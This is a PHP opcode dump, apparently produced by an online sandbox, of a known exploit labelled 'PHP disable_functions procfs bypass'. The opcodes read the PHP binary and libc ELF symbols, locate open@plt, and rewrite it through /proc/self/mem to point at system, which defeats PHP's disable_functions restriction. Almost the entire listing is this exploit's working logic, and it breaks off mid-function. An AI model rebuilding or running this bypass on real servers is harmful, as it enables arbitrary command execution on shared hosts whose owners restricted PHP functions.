Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 43) Position 1 = 10, Position 2 = 12 Branch analysis from position: 10 1 jumps found. (Code = 79) Position 1 = -2 Branch analysis from position: 12 2 jumps found. (Code = 43) Position 1 = 22, Position 2 = 23 Branch analysis from position: 22 2 jumps found. (Code = 43) Position 1 = 31, Position 2 = 33 Branch analysis from position: 31 1 jumps found. (Code = 79) Position 1 = -2 Branch analysis from position: 33 2 jumps found. (Code = 47) Position 1 = 65, Position 2 = 67 Branch analysis from position: 65 2 jumps found. (Code = 43) Position 1 = 68, Position 2 = 70 Branch analysis from position: 68 1 jumps found. (Code = 79) Position 1 = -2 Branch analysis from position: 70 2 jumps found. (Code = 43) Position 1 = 122, Position 2 = 127 Branch analysis from position: 122 1 jumps found. (Code = 79) Position 1 = -2 Branch analysis from position: 127 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 67 Branch analysis from position: 23 filename: /in/UXumO function name: (null) number of ops: 129 compiled vars: !0 = $open_php, !1 = $maps, !2 = $r, !3 = $system_offset, !4 = $open_offset, !5 = $mem, !6 = $open_addr, !7 = $libc_start, !8 = $system_addr line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 92 0 E > ECHO '%5B%2A%5D+PHP+disable_functions+procfs+bypass+%28coded+by+Beched%2C+RDot.Org%29%0A' 93 1 INIT_FCALL 'strpos' 2 INIT_FCALL 'php_uname' 3 SEND_VAL 'a' 4 DO_ICALL $9 5 SEND_VAR $9 6 SEND_VAL 'x86_64' 7 DO_ICALL $10 8 TYPE_CHECK 4 $10 9 > JMPZ ~11, ->12 94 10 > ECHO '%5B-%5D+This+exploit+is+for+x64+Linux.+Exiting%0A' 95 11 > EXIT 97 12 > INIT_FCALL 'substr' 13 INIT_FCALL 'php_uname' 14 SEND_VAL 'r' 15 DO_ICALL $12 16 SEND_VAR $12 17 SEND_VAL 0 18 SEND_VAL 4 19 DO_ICALL $13 20 IS_SMALLER $13, 2.98 21 > JMPZ ~14, ->23 98 22 > ECHO '%5B-%5D+Too+old+kernel+%28%3C+2.98%29.+Might+not+work%0A' 100 23 > ECHO '%5B%2A%5D+Trying+to+get+open%40plt+offset+in+PHP+binary%0A' 101 24 INIT_FCALL 'parseelf' 25 SEND_VAL '%2Fproc%2Fself%2Fexe' 26 SEND_VAL <true> 27 DO_FCALL 0 $15 28 ASSIGN !0, $15 102 29 IS_EQUAL !0, 0 30 > JMPZ ~17, ->33 103 31 > ECHO '%5B-%5D+Failed.+Exiting%0A' 104 32 > EXIT 106 33 > INIT_FCALL 'dechex' 34 SEND_VAR !0 35 DO_ICALL $18 36 CONCAT ~19 '%5B%2B%5D+Offset+is+0x', $18 37 CONCAT ~20 ~19, '%0A' 38 ECHO ~20 107 39 INIT_FCALL 'file_get_contents' 40 SEND_VAL '%2Fproc%2Fself%2Fmaps' 41 DO_ICALL $21 42 ASSIGN !1, $21 108 43 INIT_FCALL 'preg_match' 44 SEND_VAL '%23%5Cs%2B%28%2F.%2Blibc%5C-.%2B%29%23' 45 SEND_VAR !1 46 SEND_REF !2 47 DO_ICALL 109 48 ROPE_INIT 3 ~26 '%5B%2A%5D+Libc+location%3A+' 49 FETCH_DIM_R ~24 !2, 1 50 ROPE_ADD 1 ~26 ~26, ~24 51 ROPE_END 2 ~25 ~26, '%0A' 52 ECHO ~25 110 53 ECHO '%5B%2A%5D+Trying+to+get+open+and+system+symbols+from+Libc%0A' 111 54 INIT_FCALL 'parseelf' 55 FETCH_DIM_R ~28 !2, 1 56 SEND_VAL ~28 57 DO_FCALL 0 $29 58 FETCH_LIST_R $30 $29, 0 59 ASSIGN !3, $30 60 FETCH_LIST_R $32 $29, 1 61 ASSIGN !4, $32 62 FREE $29 112 63 IS_EQUAL ~34 !3, 0 64 > JMPNZ_EX ~34 ~34, ->67 65 > IS_EQUAL ~35 !4, 0 66 BOOL ~34 ~35 67 > > JMPZ ~34, ->70 113 68 > ECHO '%5B-%5D+Failed.+Exiting%0A' 114 69 > EXIT 116 70 > ECHO '%5B%2B%5D+Got+them.+Seeking+for+address+in+memory%0A' 117 71 INIT_FCALL 'fopen' 72 SEND_VAL '%2Fproc%2Fself%2Fmem' 73 SEND_VAL 'rb' 74 DO_ICALL $36 75 ASSIGN !5, $36 118 76 INIT_FCALL 'fseek' 77 SEND_VAR !5 78 SEND_VAR !0 79 DO_ICALL 119 80 INIT_FCALL 'unp' 81 INIT_FCALL 'fread' 82 SEND_VAR !5 83 SEND_VAL 8 84 DO_ICALL $39 85 SEND_VAR $39 86 DO_FCALL 0 $40 87 ASSIGN !6, $40 120 88 INIT_FCALL 'dechex' 89 SEND_VAR !6 90 DO_ICALL $42 91 CONCAT ~43 '%5B%2A%5D+open%40plt+addr%3A+0x', $42 92 CONCAT ~44 ~43, '%0A' 93 ECHO ~44 121 94 SUB ~45 !6, !4 95 ASSIGN !7, ~45 122 96 ADD ~47 !7, !3 97 ASSIGN !8, ~47 123 98 INIT_FCALL 'dechex' 99 SEND_VAR !8 100 DO_ICALL $49 101 CONCAT ~50 '%5B%2A%5D+system%40plt+addr%3A+0x', $49 102 CONCAT ~51 ~50, '%0A' 103 ECHO ~51 124 104 ECHO '%5B%2A%5D+Rewriting+open%40plt+address%0A' 125 105 INIT_FCALL 'fopen' 106 SEND_VAL '%2Fproc%2Fself%2Fmem' 107 SEND_VAL 'wb' 108 DO_ICALL $52 109 ASSIGN !5, $52 126 110 INIT_FCALL 'fseek' 111 SEND_VAR !5 112 SEND_VAR !0 113 DO_ICALL 127 114 INIT_FCALL 'fwrite' 115 SEND_VAR !5 116 INIT_FCALL 'packlli' 117 SEND_VAR !8 118 DO_FCALL 0 $55 119 SEND_VAR $55 120 DO_ICALL $56 121 > JMPZ $56, ->127 128 122 > ECHO '%5B%2B%5D+Address+written.+Executing+cmd%0A' 129 123 INIT_FCALL 'readfile' 124 SEND_VAL '%2Fusr%2Fbin%2Fid' 125 DO_ICALL 130 126 > EXIT 132 127 > ECHO '%5B-%5D+Write+failed.+Exiting%0A' 128 > RETURN 1 Function packlli: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/UXumO function name: packlli number of ops: 13 compiled vars: !0 = $value, !1 = $higher, !2 = $lower line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 23 0 E > RECV !0 24 1 BW_AND ~3 !0, 1.84467e+19 2 SR ~4 ~3, 32 3 ASSIGN !1, ~4 25 4 BW_AND ~6 !0, 4294967295 5 ASSIGN !2, ~6 26 6 INIT_FCALL 'pack' 7 SEND_VAL 'V2' 8 SEND_VAR !2 9 SEND_VAR !1 10 DO_ICALL $8 11 > RETURN $8 27 12* > RETURN null End of function packlli Function unp: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/UXumO function name: unp number of ops: 12 compiled vars: !0 = $value line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 29 0 E > RECV !0 30 1 INIT_FCALL 'hexdec' 2 INIT_FCALL 'bin2hex' 3 INIT_FCALL 'strrev' 4 SEND_VAR !0 5 DO_ICALL $1 6 SEND_VAR $1 7 DO_ICALL $2 8 SEND_VAR $2 9 DO_ICALL $3 10 > RETURN $3 31 11* > RETURN null End of function unp Function parseelf: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 42) Position 1 = 167 Branch analysis from position: 167 2 jumps found. (Code = 44) Position 1 = 169, Position 2 = 44 Branch analysis from position: 169 2 jumps found. (Code = 43) Position 1 = 170, Position 2 = 222 Branch analysis from position: 170 1 jumps found. (Code = 42) Position 1 = 218 Branch analysis from position: 218 2 jumps found. (Code = 44) Position 1 = 221, Position 2 = 172 Branch analysis from position: 221 1 jumps found. (Code = 42) Position 1 = 275 Branch analysis from position: 275 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 172 1 jumps found. (Code = 42) Position 1 = 210 Branch analysis from position: 210 2 jumps found. (Code = 44) Position 1 = 214, Position 2 = 208 Branch analysis from position: 214 2 jumps found. (Code = 43) Position 1 = 216, Position 2 = 217 Branch analysis from position: 216 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 217 2 jumps found. (Code = 44) Position 1 = 221, Position 2 = 172 Branch analysis from position: 221 Branch analysis from position: 172 Branch analysis from position: 208 2 jumps found. (Code = 44) Position 1 = 214, Position 2 = 208 Branch analysis from position: 214 Branch analysis from position: 208 Branch analysis from position: 222 1 jumps found. (Code = 42) Position 1 = 269 Branch analysis from position: 269 2 jumps found. (Code = 44) Position 1 = 272, Position 2 = 224 Branch analysis from position: 272 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 224 1 jumps found. (Code = 42) Position 1 = 240 Branch analysis from position: 240 2 jumps found. (Code = 44) Position 1 = 244, Position 2 = 238 Branch analysis from position: 244 2 jumps found. (Code = 43) Position 1 = 246, Position 2 = 256 Branch analysis from position: 246 2 jumps found. (Code = 43) Position 1 = 258, Position 2 = 268 Branch analysis from position: 258 2 jumps found. (Code = 44) Position 1 = 272, Position 2 = 224 Branch analysis from position: 272 Branch analysis from position: 224 Branch analysis from position: 268 Branch analysis from position: 256 Branch analysis from position: 238 2 jumps found. (Code = 44) Position 1 = 244, Position 2 = 238 Branch analysis from position: 244 Branch analysis from position: 238 Branch analysis from position: 44 2 jumps found. (Code = 43) Position 1 = 58, Position 2 = 95 Branch analysis from position: 58 1 jumps found. (Code = 42) Position 1 = 166 Branch analysis from position: 166 2 jumps found. (Code = 44) Position 1 = 169, Position 2 = 44 Branch analysis from position: 169 Branch analysis from position: 44 Branch analysis from position: 95 2 jumps found. (Code = 46) Position 1 = 98, Position 2 = 100 Branch analysis from position: 98 2 jumps found. (Code = 43) Position 1 = 101, Position 2 = 126 Branch analysis from position: 101 1 jumps found. (Code = 42) Position 1 = 166 Branch analysis from position: 166 Branch analysis from position: 126 2 jumps found. (Code = 46) Position 1 = 127, Position 2 = 129 Branch analysis from position: 127 2 jumps found. (Code = 43) Position 1 = 130, Position 2 = 166 Branch analysis from position: 130 2 jumps found. (Code = 44) Position 1 = 169, Position 2 = 44 Branch analysis from position: 169 Branch analysis from position: 44 Branch analysis from position: 166 Branch analysis from position: 129 Branch analysis from position: 100 filename: /in/UXumO function name: parseelf number of ops: 276 compiled vars: !0 = $bin_ver, !1 = $rela, !2 = $bin, !3 = $e_shoff, !4 = $e_shentsize, !5 = $e_shnum, !6 = $e_shstrndx, !7 = $i, !8 = $sh_type, !9 = $dynsym_off, !10 = $dynsym_size, !11 = $dynsym_entsize, !12 = $strtab_off, !13 = $strtab_size, !14 = $relaplt_off, !15 = $relaplt_size, !16 = $relaplt_entsize, !17 = $r_offset, !18 = $r_info, !19 = $name_off, !20 = $name, !21 = $j, !22 = $system_offset, !23 = $open_offset line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 33 0 E > RECV !0 1 RECV_INIT !1 <false> 34 2 INIT_FCALL 'file_get_contents' 3 SEND_VAR !0 4 DO_ICALL $24 5 ASSIGN !2, $24 35 6 INIT_FCALL 'unp' 7 INIT_FCALL 'substr' 8 SEND_VAR !2 9 SEND_VAL 40 10 SEND_VAL 8 11 DO_ICALL $26 12 SEND_VAR $26 13 DO_FCALL 0 $27 14 ASSIGN !3, $27 36 15 INIT_FCALL 'unp' 16 INIT_FCALL 'substr' 17 SEND_VAR !2 18 SEND_VAL 58 19 SEND_VAL 2 20 DO_ICALL $29 21 SEND_VAR $29 22 DO_FCALL 0 $30 23 ASSIGN !4, $30 37 24 INIT_FCALL 'unp' 25 INIT_FCALL 'substr' 26 SEND_VAR !2 27 SEND_VAL 60 28 SEND_VAL 2 29 DO_ICALL $32 30 SEND_VAR $32 31 DO_FCALL 0 $33 32 ASSIGN !5, $33 38 33 INIT_FCALL 'unp' 34 INIT_FCALL 'substr' 35 SEND_VAR !2 36 SEND_VAL 62 37 SEND_VAL 2 38 DO_ICALL $35 39 SEND_VAR $35 40 DO_FCALL 0 $36 41 ASSIGN !6, $36 40 42 ASSIGN !7, 0 43 > JMP ->167 41 44 > INIT_FCALL 'unp' 45 INIT_FCALL 'substr' 46 SEND_VAR !2 47 MUL ~39 !7, !4 48 ADD ~40 !3, ~39 49 ADD ~41 ~40, 4 50 SEND_VAL ~41 51 SEND_VAL 4 52 DO_ICALL $42 53 SEND_VAR $42 54 DO_FCALL 0 $43 55 ASSIGN !8, $43 42 56 IS_EQUAL !8, 11 57 > JMPZ ~45, ->95 43 58 > INIT_FCALL 'unp' 59 INIT_FCALL 'substr' 60 SEND_VAR !2 61 MUL ~46 !7, !4 62 ADD ~47 !3, ~46 63 ADD ~48 ~47, 24 64 SEND_VAL ~48 65 SEND_VAL 8 66 DO_ICALL $49 67 SEND_VAR $49 68 DO_FCALL 0 $50 69 ASSIGN !9, $50 44 70 INIT_FCALL 'unp' 71 INIT_FCALL 'substr' 72 SEND_VAR !2 73 MUL ~52 !7, !4 74 ADD ~53 !3, ~52 75 ADD ~54 ~53, 32 76 SEND_VAL ~54 77 SEND_VAL 8 78 DO_ICALL $55 79 SEND_VAR $55 80 DO_FCALL 0 $56 81 ASSIGN !10, $56 45 82 INIT_FCALL 'unp' 83 INIT_FCALL 'substr' 84 SEND_VAR !2 85 MUL ~58 !7, !4 86 ADD ~59 !3, ~58 87 ADD ~60 ~59, 56 88 SEND_VAL ~60 89 SEND_VAL 8 90 DO_ICALL $61 91 SEND_VAR $61 92 DO_FCALL 0 $62 93 ASSIGN !11, $62 94 > JMP ->166 47 95 > ISSET_ISEMPTY_CV ~64 !12 96 BOOL_NOT ~65 ~64 97 > JMPZ_EX ~65 ~65, ->100 98 > IS_EQUAL ~66 !8, 3 99 BOOL ~65 ~66 100 > > JMPZ ~65, ->126 48 101 > INIT_FCALL 'unp' 102 INIT_FCALL 'substr' 103 SEND_VAR !2 104 MUL ~67 !7, !4 105 ADD ~68 !3, ~67 106 ADD ~69 ~68, 24 107 SEND_VAL ~69 108 SEND_VAL 8 109 DO_ICALL $70 110 SEND_VAR $70 111 DO_FCALL 0 $71 112 ASSIGN !12, $71 49 113 INIT_FCALL 'unp' 114 INIT_FCALL 'substr' 115 SEND_VAR !2 116 MUL ~73 !7, !4 117 ADD ~74 !3, ~73 118 ADD ~75 ~74, 32 119 SEND_VAL ~75 120 SEND_VAL 8 121 DO_ICALL $76 122 SEND_VAR $76 123 DO_FCALL 0 $77 124 ASSIGN !13, $77 125 > JMP ->166 51 126 > > JMPZ_EX ~79 !1, ->129 127 > IS_EQUAL ~80 !8, 4 128 BOOL ~79 ~80 129 > > JMPZ ~79, ->166 52 130 > INIT_FCALL 'unp' 131 INIT_FCALL 'substr' 132 SEND_VAR !2 133 MUL ~81 !7, !4 134 ADD ~82 !3, ~81 135 ADD ~83 ~82, 24 136 SEND_VAL ~83 137 SEND_VAL 8 138 DO_ICALL $84 139 SEND_VAR $84 140 DO_FCALL 0 $85 141 ASSIGN !14, $85 53 142 INIT_FCALL 'unp' 143 INIT_FCALL 'substr' 144 SEND_VAR !2 145 MUL ~87 !7, !4 146 ADD ~88 !3, ~87 147 ADD ~89 ~88, 32 148 SEND_VAL ~89 149 SEND_VAL 8 150 DO_ICALL $90 151 SEND_VAR $90 152 DO_FCALL 0 $91 153 ASSIGN !15, $91 54 154 INIT_FCALL 'unp' 155 INIT_FCALL 'substr' 156 SEND_VAR !2 157 MUL ~93 !7, !4 158 ADD ~94 !3, ~93 159 ADD ~95 ~94, 56 160 SEND_VAL ~95 161 SEN
Generated using Vulcan Logic Dumper, using php 8.0.0